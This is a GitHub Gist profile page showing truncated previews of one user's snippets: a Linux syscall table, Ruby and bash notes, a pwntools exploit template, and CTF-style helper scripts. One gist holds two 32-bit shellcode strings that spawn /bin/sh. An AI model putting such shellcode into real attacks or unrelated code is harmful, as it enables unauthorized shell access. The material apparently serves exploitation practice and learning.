Skip to content

Instantly share code, notes, and snippets.

View grittyninja's full-sized avatar
🤸

Herdian N grittyninja

🤸
  • Indonesia
View GitHub Profile
<table border=""><tbody><tr><th align="left">%rax</th><th align="left">System call</th><th align="left">%rdi</th><th align="left">%rsi</th><th align="left">%rdx</th><th align="left">%r10</th><th align="left">%r8</th><th align="left">%r9</th></tr><tr><td>0</td><td>sys_read</td><td>unsigned int fd</td><td>char *buf</td><td>size_t count</td><td></td><td></td><td></td></tr><tr><td>1</td><td>sys_write</td><td>unsigned int fd</td><td>const char *buf</td><td>size_t count</td><td></td><td></td><td></td></tr><tr><td>2</td><td>sys_open</td><td>const char *filename</td><td>int flags</td><td>int mode</td><td></td><td></td><td></td></tr><tr><td>3</td><td>sys_close</td><td>unsigned int fd</td><td></td><td></td><td></td><td></td><td></td></tr><tr><td>4</td><td>sys_stat</td><td>const char *filename</td><td>struct stat *statbuf</td><td></td><td></td><td></td><td></td></tr><tr><td>5</td><td>sys_fstat</td><td>unsigned int fd</td><td>struct stat *statbuf</td><td></td><td></td><td></td><td></td></tr><tr><td>6</td><td>sys_lstat</t
# Class methods are methods that are called on a class and instance methods are methods that are called on an instance of a class.
class Foo
# Class method
class << self
def bar
puts "class method"
end
#!/bin/bash
# SETTINGS
CLIENT="10.0.2.15"
SPLIT=180
CLASS=$2
# FUNCTIONS
function AVG {
LIST=(${@})
SUM=0
#!/bin/bash
echo "[+] TCP STREAM"
STREAM=0
while true; do
IP=$(tshark -r tmp_einqrztl_10.pcapng -Y "tcp.stream eq $STREAM" -T fields -e ip.dst | sed -e 's/10.0.2.15//g' | sort | uniq | tr -d '\n')
if [ $IP ]; then
echo "[+] Extracting statistics data from Conversation $STREAM"
# CALCULATE HERE
else
[[ Spawning /bin/sh ]]
#### BY SHELLSTORM ####
# 32 bit
## 23 bytes
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
## 21 bytes
"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
$ sudo socat TCP-LISTEN:31337,reuseaddr,fork EXEC:./pwnme,su=nobody
2's Complements:
-(num) & (2**nbit - 1)
<pre><code class="line-numbers language-python"># Author: hrdn
test = ["H","E","L","L","O"]
"".join(test)
</code>
</pre>
import sys
from pwn import *
def exploit(r):
# craft exploit here
if __name__ == "__main__":
log.info("%s HOST PORT" % sys.argv[0])
if len(sys.argv) > 1:
r = remote(sys.argv[1], int(sys.argv[2]))
#!/usr/bin/env python2
import os
import string
import operator
import commands
charset = "_{}" + string.ascii_letters + string.digits
offset = 24 # true condition - false condition
tmp = ""
cm = ""
def main():